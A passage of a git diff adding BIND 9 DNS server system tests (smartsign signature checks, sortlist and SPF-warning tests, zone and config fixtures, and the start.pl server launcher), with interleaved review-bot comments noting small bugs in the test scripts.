IN" ${czsk2}.key > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking key TTLs were imported correctly" +ret=0 +awk 'BEGIN {r = 0} $2 == "DNSKEY" && $1 != 30 {r = 1} END {exit r}' \ + ${cfile}.signed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "re-signing and checking imported TTLs again" +ret=0 +$SETTIME -L 15 ${czsk2} > /dev/null +czoneout=$($SIGNER -Sg -e now+1d -X now+2d -o $czone $cfile) +awk 'BEGIN {r = 0} $2 == "DNSKEY" && $1 != 15 {r = 1} END {exit r}' \ + ${cfile}.signed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# There is some weirdness in Solaris 10 (Generic_120011-14), which +# is why the next section has all those echo $ret > /dev/null;sync +# commands +echo_i "checking child zone signatures" +ret=0 +# check DNSKEY signatures first +awk '$2 == "RRSIG" && $3 == "DNSKEY" { getline; print $3 }' $cfile.signed > dnskey.sigs +sub=0 +grep -w "$ckactive" dnskey.sigs > /dev/null || sub=1 +if [ $sub != 0 ]; then echo_i "missing ckactive $ckactive (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckrevoked" dnskey.sigs > /dev/null || sub=1 +if [ $sub != 0 ]; then echo_i "missing ckrevoke $ckrevoke (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czactive" dnskey.sigs > /dev/null || sub=1 +if [ $sub != 0 ]; then echo_i "missing czactive $czactive (dnskey)"; ret=1; fi +# should not be there: +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckprerevoke" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckprerevoke $ckprerevoke (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckpublished" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckpublished $ckpublished (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czpublished" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czpublished 
$czpublished (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czinactive" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czinactive $czinactive (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czgenerated" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czgenerated $czgenerated (dnskey)"; ret=1; fi +# now check other signatures first +awk '$2 == "RRSIG" && $3 != "DNSKEY" && $3 != "CDNSKEY" && $3 != "CDS" { getline; print $3 }' $cfile.signed | sort -un > other.sigs +# should not be there: +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckactive" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckactive $ckactive (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckpublished" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckpublished $ckpublished (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckprerevoke" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckprerevoke $ckprerevoke (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckrevoked" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckrevoked $ckrevoked (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czpublished" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czpublished $czpublished (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czinactive" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czinactive $czinactive (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czgenerated" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czgenerated $czgenerated (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czpredecessor" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czpredecessor $czpredecessor (other)"; ret=1; fi +echo $ret > /dev/null +sync 
+sub=0 +grep -w "$czsuccessor" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czsuccessor $czsuccessor (other)"; ret=1; fi +if [ $ret != 0 ]; then + sed 's/^/I:dnskey sigs: /' < dnskey.sigs + sed 's/^/I:other sigs: /' < other.sigs + echo_i "failed"; +fi +status=$((status + ret)) + +echo_i "checking RRSIG expiry date correctness" +dnskey_expiry=$($CHECKZONE -o - $czone $cfile.signed 2> /dev/null | + awk '$4 == "RRSIG" && $5 == "DNSKEY" {print $9; exit}' | + cut -c1-10) +soa_expiry=$($CHECKZONE -o - $czone $cfile.signed 2> /dev/null | + awk '$4 == "RRSIG" && $5 == "SOA" {print $9; exit}' | + cut -c1-10) +[ $dnskey_expiry -gt $soa_expiry ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "waiting 30 seconds for key activation" +sleep 30 +echo_i "re-signing child zone" +czoneout2=$($SIGNER -Sg -o $czone -f $cfile.new $cfile.signed) +mv $cfile.new $cfile.signed + +echo_i "checking dnssec-signzone output matches expectations" +ret=0 +echo "$czoneout2" | grep 'KSKs: 2 active, 0 stand-by, 1 revoked' > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking child zone signatures again" +ret=0 +awk '$2 == "RRSIG" && $3 == "DNSKEY" { getline; print $3 }' $cfile.signed > dnskey.sigs +grep -w "$ckpublished" dnskey.sigs > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking sync record publication" +ret=0 +awk 'BEGIN { r=1 } $2 == "CDNSKEY" { r=0 } END { exit r }' $cfile.signed || ret=1 +awk 'BEGIN { r=1 } $2 == "CDS" { r=0 } END { exit r }' $cfile.signed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# this also checks that the future sync record is not yet published +echo_i "checking sync record deletion" +ret=0 +$SETTIME -P now -A now -Dsync now ${cksk5} > /dev/null +$SIGNER -Sg -o $czone -f $cfile.new $cfile.signed > /dev/null +mv $cfile.new $cfile.signed +awk 'BEGIN { 
r=1 } $2 == "CDNSKEY" { r=0 } END { exit r }' $cfile.signed && ret=1 +awk 'BEGIN { r=1 } $2 == "CDS" { r=0 } END { exit r }' $cfile.signed && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/sortlist/clean.sh b/bin/tests/system/sortlist/clean.sh new file mode 100644 index 0000000..b490f46 --- /dev/null +++ b/bin/tests/system/sortlist/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f *.dig *.good *.out +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/sortlist/ns1/example.db b/bin/tests/system/sortlist/ns1/example.db new file mode 100644 index 0000000..b68e215 --- /dev/null +++ b/bin/tests/system/sortlist/ns1/example.db 
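Review bot: The "checking RRSIG expiry date correctness" step in `smartsign/tests.sh` never resets `ret`, so a failure in the preceding "checking child zone signatures" step is reported again under this heading and added to `status` a second time. Add `ret=0` directly after that `echo_i` line, as every other step in the script does. In the same file the diagnostic `echo_i "missing ckrevoke $ckrevoke (dnskey)"` expands `$ckrevoke`, which is never assigned (the variable set earlier is `ckrevoked`), so the message would print an empty key id. It should use `$ckrevoked`.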
@@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns1.example. hostmaster.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns1.example. +ns1.example. A 10.53.0.1 + +; Let's see what the sortlist picks out of this... +a A 1.1.1.1 +a A 1.1.1.5 +a A 1.1.1.2 +a A 192.168.3.1 +a A 1.1.1.3 +a A 192.168.1.1 +a A 1.1.1.4 + +b A 10.53.0.1 +b A 10.53.0.2 +b A 10.53.0.3 +b A 10.53.0.4 +b A 10.53.0.5 + diff --git a/bin/tests/system/sortlist/ns1/named.conf.in b/bin/tests/system/sortlist/ns1/named.conf.in new file mode 100644 index 0000000..33081ff --- /dev/null +++ b/bin/tests/system/sortlist/ns1/named.conf.in 
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+
+ sortlist {
+ { 10.53.0.1; // IF 10.53.0.1
+ {
+ !1.1.1.4; !1.1.1.2; !1.1.1.3; !1.1.1.1; // sort these last,
+ 192.168.3/24; // this first
+ { 192.168.2/24; 192.168.1/24; }; }; }; // and these next
+ { { 10.53.0.2; 10.53.0.3; }; }; // Prefer self
+ 10.53.0.4; // BIND 8 compat
+ { 10.53.0.5; 10.53.0.5; }; // BIND 8 compat
+ };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/sortlist/ns1/root.db b/bin/tests/system/sortlist/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/sortlist/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/sortlist/setup.sh b/bin/tests/system/sortlist/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/sortlist/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/sortlist/tests.sh b/bin/tests/system/sortlist/tests.sh
new file mode 100644
index 0000000..b290a99
--- /dev/null
+++ b/bin/tests/system/sortlist/tests.sh
@@ -0,0 +1,51 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+DIGOPTS="+tcp +noadd +nosea +nostat +noquest +noauth +nocomm +nocmd -p ${PORT}"
+
+status=0
+
+echo_i "test 2-element sortlist statement"
+cat <<EOF >test1.good
+a.example. 300 IN A 192.168.3.1
+a.example. 300 IN A 192.168.1.1
+a.example. 300 IN A 1.1.1.5
+a.example. 300 IN A 1.1.1.1
+a.example. 300 IN A 1.1.1.3
+a.example. 300 IN A 1.1.1.2
+a.example. 300 IN A 1.1.1.4
+EOF
+$DIG $DIGOPTS a.example. @10.53.0.1 -b 10.53.0.1 >test1.dig
+# Note that this can't use digcomp.pl because here, the ordering of the
+# result RRs is significant.
+$DIFF test1.dig test1.good || status=1
+
+echo_i "test 1-element sortlist statement and undocumented BIND 8 features"
+ cat <<EOF >test2.good
+b.example. 300 IN A 10.53.0.$n
+EOF
+
+$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.2 | sed 1q | \
+ grep -E '10.53.0.(2|3)$' > test2.out &&
+$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.3 | sed 1q | \
+ grep -E '10.53.0.(2|3)$' >> test2.out &&
+$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.4 | sed 1q | \
+ grep -E '10.53.0.4$' >> test2.out &&
+$DIG $DIGOPTS b.example. @10.53.0.1 -b 10.53.0.5 | sed 1q | \
+ grep -E '10.53.0.5$' >> test2.out || status=1
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/spf/clean.sh b/bin/tests/system/spf/clean.sh
new file mode 100644
index 0000000..90dc7b6
--- /dev/null
+++ b/bin/tests/system/spf/clean.sh
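Review bot: The `test2.good` file written by the second here-document in sortlist/tests.sh is never compared with anything, and it expands `$n`, which this script does not assign (unless conf.sh happens to set it), so the fixture records no usable expectation. The second test's result comes only from the chained `grep -E` calls that write `test2.out`; either remove the here-document or diff against it as the first test does with `test1.good`. In those patterns the dots are unescaped and the address is not anchored on the left, so `grep -E '10.53.0.(2|3)$'` accepts more than the intended address; `grep -E '[[:space:]]10\.53\.0\.(2|3)$'` would pin it, and the same applies to the `10.53.0.4$` and `10.53.0.5$` patterns.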
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ns1/named.run
+rm -f ns1/named.memstats
+rm -f ns*/named.lock
+rm -f ns*/named.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/spf/ns1/named.conf.in b/bin/tests/system/spf/ns1/named.conf.in
new file mode 100644
index 0000000..f828586
--- /dev/null
+++ b/bin/tests/system/spf/ns1/named.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences yes;
+};
+
+zone "spf" {
+ type primary;
+ file "spf.db";
+};
+
+zone "warn" {
+ type primary;
+ file "spf.db";
+ check-spf warn;
+};
+
+zone "nowarn" {
+ type primary;
+ file "spf.db";
+ check-spf ignore;
+};
diff --git a/bin/tests/system/spf/ns1/spf.db b/bin/tests/system/spf/ns1/spf.db
new file mode 100644
index 0000000..9527b1b
--- /dev/null
+++ b/bin/tests/system/spf/ns1/spf.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 IN SOA . . 0 0 0 0 0
+@ 0 IN NS .
+@ 0 IN TXT "v=spf1 -all"
+@ 0 IN SPF "v=spf1 -all"
+x 0 IN TXT "v=spf1"
+y 0 IN SPF "v=spf1"
+y 0 IN TXT "a non spf record"
diff --git a/bin/tests/system/spf/setup.sh b/bin/tests/system/spf/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/spf/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/spf/tests.sh b/bin/tests/system/spf/tests.sh
new file mode 100644
index 0000000..b7e86f0
--- /dev/null
+++ b/bin/tests/system/spf/tests.sh
@@ -0,0 +1,46 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+n=1
+status=0
+
+# Wait until all zones are loaded before checking SPF related logs
+for i in 1 2 3 4 5 6 7 8 9 10
+do
+ grep "all zones loaded" ns1/named.run > /dev/null && break
+ sleep 1
+done
+
+echo_i "checking that SPF warnings have been correctly generated ($n)"
+ret=0
+
+grep "zone spf/IN: loaded serial 0" ns1/named.run > /dev/null || ret=1
+grep "'y.spf' found type SPF" ns1/named.run > /dev/null || ret=1
+grep "'spf' found type SPF" ns1/named.run > /dev/null && ret=1
+
+grep "zone warn/IN: loaded serial 0" ns1/named.run > /dev/null || ret=1
+grep "'y.warn' found type SPF" ns1/named.run > /dev/null || ret=1
+grep "'warn' found type SPF" ns1/named.run > /dev/null && ret=1
+
+grep "zone nowarn/IN: loaded serial 0" ns1/named.run > /dev/null || ret=1
+grep "'y.nowarn' found type SPF" ns1/named.run > /dev/null && ret=1
+grep "'nowarn' found type SPF" ns1/named.run > /dev/null && ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/start.pl b/bin/tests/system/start.pl
new file mode 100755
index 0000000..80d25ee
--- /dev/null
+++ b/bin/tests/system/start.pl
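Review bot: The wait loop for `all zones loaded` in spf/tests.sh falls through silently after ten attempts, so a server that is slow or failed to load its zones is reported as a wrong SPF warning rather than as a startup timeout. The greps that follow then read a possibly incomplete `ns1/named.run`, and the three `&& ret=1` absence checks are only meaningful once loading has finished. Record the timeout explicitly after the loop, for example `grep "all zones loaded" ns1/named.run > /dev/null || { echo_i "zones not loaded"; status=1; }`, so the log shows which condition failed.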
@@ -0,0 +1,451 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Framework for starting test servers. +# Based on the type of server specified, check for port availability, remove +# temporary files, start the server, and verify that the server is running. +# If a server is specified, start it. Otherwise, start all servers for test. + +use strict; +use warnings; + +use Cwd ':DEFAULT', 'abs_path'; +use English '-no_match_vars'; +use Getopt::Long; +use Time::HiRes 'sleep'; # allows sleeping fractional seconds + +# Usage: +# perl start.pl [--noclean] [--restart] [--port port] [--taskset cpus] test [server [options]] +# +# --noclean Do not cleanup files in server directory. +# +# --restart Indicate that the server is being restarted, so get the +# server to append output to an existing log file instead of +# starting a new one. +# +# --port port Specify the default port being used by the server to answer +# queries (default 5300). This script will interrogate the +# server on this port to see if it is running. (Note: for +# "named" nameservers, this can be overridden by the presence +# of the file "named.port" in the server directory containing +# the number of the query port.) +# +# --taskset cpus Use taskset to signal which cpus can be used. For example +# cpus=fff0 means all cpus aexcept for 0, 1, 2, and 3 are +# eligible. +# +# test Name of the test directory. +# +# server Name of the server directory. This will be of the form +# "nsN" or "ansN", where "N" is an integer between 1 and 8. +# If not given, the script will start all the servers in the +# test directory. 
+# +# options Alternate options for the server. +# +# NOTE: options must be specified with '-- "<option list>"', +# for instance: start.pl . ns1 -- "-c n.conf -d 43" +# +# ALSO NOTE: this variable will be filled with the contents +# of the first non-commented/non-blank line of args in a file +# called "named.args" in an ns*/ subdirectory. Only the FIRST +# non-commented/non-blank line is used (everything else in +# the file is ignored). If "options" is already set, then +# "named.args" is ignored. + +my $usage = "usage: $0 [--noclean] [--restart] [--port <port>] [--taskset <cpus>] test-directory [server-directory [server-options]]"; +my $clean = 1; +my $restart = 0; +my $queryport = 5300; +my $taskset = ""; + +GetOptions( + 'clean!' => \$clean, + 'restart!' => \$restart, + 'port=i' => \$queryport, + 'taskset=s' => \$taskset, +) or die "$usage\n"; + +my( $test, $server_arg, $options_arg ) = @ARGV; + +if (!$test) { + die "$usage\n"; +} + +# Global variables +my $topdir = abs_path($ENV{'SYSTEMTESTTOP'}); +my $testdir = abs_path($topdir . "/" . $test); + +if (! -d $testdir) { + die "No test directory: \"$testdir\"\n"; +} + +if ($server_arg && ! -d "$testdir/$server_arg") { + die "No server directory: \"$testdir/$server_arg\"\n"; +} + +my $NAMED = $ENV{'NAMED'}; +my $DIG = $ENV{'DIG'}; +my $PERL = $ENV{'PERL'}; +my $PYTHON = $ENV{'PYTHON'}; + +# Start the server(s) + +my @ns; +my @ans; + +if ($server_arg) { + if ($server_arg =~ /^ns/) { + push(@ns, $server_arg); + } elsif ($server_arg =~ /^ans/) { + push(@ans, $server_arg); + } else { + print "$0: ns or ans directory expected"; + print "I:$test:failed"; + } +} else { + # Determine which servers need to be started for this test. + opendir DIR, $testdir or die "unable to read test directory: \"$test\" ($OS_ERROR)\n"; + my @files = sort readdir DIR; + closedir DIR; + + @ns = grep /^ns[0-9]*$/, @files; + @ans = grep /^ans[0-9]*$/, @files; +} + +# Start the servers we found. 
+ +foreach my $name(@ns) { + my $instances_so_far = count_running_lines($name); + &check_ns_port($name); + &start_ns_server($name, $options_arg); + &verify_ns_server($name, $instances_so_far); +} + +foreach my $name(@ans) { + &start_ans_server($name); +} + +# Subroutines + +sub read_ns_port { + my ( $server ) = @_; + my $port = $queryport; + my $options = ""; + + if ($server) { + my $file = $testdir . "/" . $server . "/named.port"; + + if (-e $file) { + open(my $fh, "<", $file) or die "unable to read ports file \"$file\" ($OS_ERROR)"; + + my $line = <$fh>; + + if ($line) { + chomp $line; + $port = $line; + } + } + } + return ($port); +} + +sub check_ns_port { + my ( $server ) = @_; + my $options = ""; + my $port = read_ns_port($server); + + if ($server =~ /(\d+)$/) { + $options = "-i $1"; + } + + my $tries = 0; + + while (1) { + my $return = system("$PERL $topdir/testsock.pl -p $port $options"); + + if ($return == 0) { + last; + } + + $tries++; + + if ($tries > 4) { + print "$0: could not bind to server addresses, still running?\n"; + print "I:$test:server sockets not available\n"; + print "I:$test:failed\n"; + + system("$PERL $topdir/stop.pl $test"); # Is this the correct behavior? 
+ + exit 1; + } + + print "I:$test:Couldn't bind to socket (yet)\n"; + sleep 2; + } +} + +sub start_server { + my ( $server, $command, $pid_file ) = @_; + + chdir "$testdir/$server" or die "unable to chdir \"$testdir/$server\" ($OS_ERROR)\n"; + + # start the server + my $child = `$command`; + chomp($child); + + # wait up to 14 seconds for the server to start and to write the + # pid file otherwise kill this server and any others that have + # already been started + my $tries = 0; + while (!-s $pid_file) { + if (++$tries > 140) { + print "I:$test:Couldn't start server $command (pid=$child)\n"; + print "I:$test:failed\n"; + kill "ABRT", $child if ("$child" ne ""); + chdir "$testdir"; + system "$PERL $topdir/stop.pl $test"; + exit 1; + } + sleep 0.1; + } + + # go back to the top level directory + chdir $topdir; +} + +sub construct_ns_command { + my ( $server, $options ) = @_; + + my $command; + + if ($ENV{'USE_VALGRIND'}) { + $command = "valgrind -q --gen-suppressions=all --num-callers=48 --fullpath-after= --log-file=named-$server-valgrind-%p.log "; + + if ($ENV{'USE_VALGRIND'} eq 'helgrind') { + $command .= "--tool=helgrind "; + } else { + $command .= "--tool=memcheck --track-origins=yes --leak-check=full "; + } + + $command .= "$NAMED -m none -M external "; + } else { + if ($taskset) { + $command = "taskset $taskset $NAMED "; + } else { + $command = "$NAMED "; + } + } + + my $args_file = $testdir . "/" . $server . "/" . 
"named.args"; + + if ($options) { + $command .= $options; + } elsif (-e $args_file) { + open(my $fh, "<", $args_file) or die "unable to read args_file \"$args_file\" ($OS_ERROR)\n"; + + while(my $line=<$fh>) { + next if ($line =~ /^\s*$/); #discard blank lines + next if ($line =~ /^\s*#/); #discard comment lines + + chomp $line; + + $line =~ s/#.*$//; + + $command .= $line; + + last; + } + } else { + $command .= "-D $test-$server "; + $command .= "-X named.lock "; + $command .= "-m record,size,mctx "; + + foreach my $t_option( + "dropedns", "ednsformerr", "ednsnotimp", "ednsrefused", + "noaa", "noedns", "nosoa", "maxudp512", "maxudp1460", + ) { + if (-e "$testdir/$server/named.$t_option") { + $command .= "-T $t_option " + } + } + + $command .= "-c named.conf -d 99 -g -U 4 -T maxcachesize=2097152"; + } + + if (-e "$testdir/$server/named.notcp") { + $command .= " -T notcp" + } + + if ($restart) { + $command .= " >>named.run 2>&1 &"; + } else { + $command .= " >named.run 2>&1 &"; + } + + # get the shell to report the pid of the server ($!) 
+ $command .= " echo \$!"; + + return $command; +} + +sub start_ns_server { + my ( $server, $options ) = @_; + + my $cleanup_files; + my $command; + my $pid_file; + + $cleanup_files = "{./*.jnl,./*.bk,./*.st,./named.run}"; + + $command = construct_ns_command($server, $options); + + $pid_file = "named.pid"; + + if ($clean) { + unlink glob $cleanup_files; + } + + start_server($server, $command, $pid_file); +} + +sub construct_ans_command { + my ( $server, $options ) = @_; + + my $command; + my $n; + + if ($server =~ /^ans(\d+)/) { + $n = $1; + } else { + die "unable to parse server number from name \"$server\"\n"; + } + + if (-e "$testdir/$server/ans.py") { + $command = "$PYTHON -u ans.py 10.53.0.$n $queryport"; + } elsif (-e "$testdir/$server/ans.pl") { + $command = "$PERL ans.pl"; + } else { + $command = "$PERL $topdir/ans.pl 10.53.0.$n"; + } + + if ($options) { + $command .= $options; + } + + if ($restart) { + $command .= " >>ans.run 2>&1 &"; + } else { + $command .= " >ans.run 2>&1 &"; + } + + # get the shell to report the pid of the server ($!) 
+ $command .= " echo \$!"; + + return $command; +} + +sub start_ans_server { + my ( $server, $options ) = @_; + + my $cleanup_files; + my $command; + my $pid_file; + + $cleanup_files = "{./ans.run}"; + $command = construct_ans_command($server, $options); + $pid_file = "ans.pid"; + + if ($clean) { + unlink glob $cleanup_files; + } + + start_server($server, $command, $pid_file); +} + +sub count_running_lines { + my ( $server ) = @_; + + my $runfile = "$testdir/$server/named.run"; + + # the shell *ought* to have created the file immediately, but this + # logic allows the creation to be delayed without issues + if (open(my $fh, "<", $runfile)) { + # the two non-whitespace blobs should be the date and time + # but we don't care about them really, only that they are there + return scalar(grep /^\S+ \S+ running\R/, <$fh>); + } else { + return 0; + } +} + +sub verify_ns_server { + my ( $server, $instances_so_far ) = @_; + + my $tries = 0; + + while (count_running_lines($server) < $instances_so_far + 1) { + $tries++; + + if ($tries >= 30) { + print "I:$test:server $server seems to have not started\n"; + print "I:$test:failed\n"; + + system("$PERL $topdir/stop.pl $test"); + + exit 1; + } + + sleep 2; + } + + $tries = 0; + + my $port = read_ns_port($server); + my $tcp = "+tcp"; + my $n; + + if ($server =~ 